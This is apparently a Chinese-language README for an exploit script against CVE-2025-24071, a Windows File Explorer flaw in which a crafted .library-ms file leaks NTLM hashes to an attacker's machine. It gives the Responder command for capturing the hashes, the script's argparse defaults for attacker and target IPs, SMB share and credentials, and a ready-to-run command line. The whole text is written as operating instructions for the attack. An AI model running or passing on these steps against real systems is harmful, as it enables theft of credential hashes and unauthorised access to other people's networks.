本项目检测并展示 Windows 文件资源管理器欺骗漏洞的利用方法。
该问题源于一个包含网络路径的 Windows 库文件(.library-ms),该文件可直接作为附件嵌入或包含在压缩包中。
打开该文件时,可能导致 Windows 向远程(潜在恶意)网络位置 泄露 NTLM 哈希。
在攻击机上运行 Responder 以捕获 NTLM 哈希:
sudo responder -I tun0 -wvF
你可以通过两种方式配置脚本:
✅ 选项 A:编辑默认值(最简单)
直接在脚本中修改默认参数。
parser.add_argument("--attacker-ip", default="10.10.14.14", help="攻击者 IP") # 你的 IP
parser.add_argument("--target-ip", default="10.129.232.88", help="目标 IP") # 目标 IP
parser.add_argument("--share-name", default="IT", help="SMB 共享名称") # 你拥有访问权限的共享名称(不带 /)
parser.add_argument("--username", default="USERNAME", help="SMB 用户名") # 共享拥有者的用户名
parser.add_argument("--password", default="PASSWORD", help="SMB 密码") # 共享拥有者的密码
parser.add_argument("--interface", default="tun0", help="Responder 网络接口") # 检查 ifconfig,如果你在 VPN 上,tun0 即可使用
return parser.parse_args()
✅ 选项 B:使用命令行参数运行
带参数执行:
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>